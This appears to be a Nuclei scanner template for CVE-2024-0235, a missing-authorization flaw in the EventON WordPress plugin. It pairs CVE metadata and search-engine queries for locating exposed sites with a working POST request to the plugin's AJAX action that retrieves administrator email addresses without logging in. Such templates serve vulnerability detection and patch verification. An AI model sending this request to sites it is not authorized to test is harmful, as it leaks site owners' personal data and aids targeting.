id: CVE-2024-0235

info:
  name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
  author: ProjectDiscoveryAI
  severity: medium
  description: |
    The EventON WordPress plugin before 4.5.5 and the EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve the email addresses of any users on the blog.
  impact: |
    An attacker could potentially access sensitive email information.
  remediation: |
    Update to the latest version of the EventON WordPress Plugin to mitigate CVE-2024-0235.
  reference:
    - https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0235
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-0235
    cwe-id: CWE-862
    epss-score: 0.86512
    epss-percentile: 0.9943
    cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: myeventon
    product: eventon
    framework: wordpress
    shodan-query:
      - "vuln:CVE-2023-2796"
      - http.html:/wp-content/plugins/eventon-lite/
      - http.html:/wp-content/plugins/eventon/
    fofa-query:
      - "wp-content/plugins/eventon/"
      - body=/wp-content/plugins/eventon/
      - body=/wp-content/plugins/eventon-lite/
    publicwww-query:
      - "/wp-content/plugins/eventon/"
      - /wp-content/plugins/eventon-lite/
    google-query: "inurl:\"/wp-content/plugins/eventon/\""
  tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon,vkev,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"

    headers:
      Content-Type: application/x-www-form-urlencoded

    body: "_user_role=administrator"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '@'
          - 'status":"good'
          - 'value='
          - '"content":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100cc52b2f6857df3089a9cf9c219bbfc42b369d1d60726824800901b225c9eb9cb02203143e8205e0eaf89f14a5ae22b052f107bc486ce5e9c4b942c0078210f087d7a:922c64590222798bb761d5b6d8e72950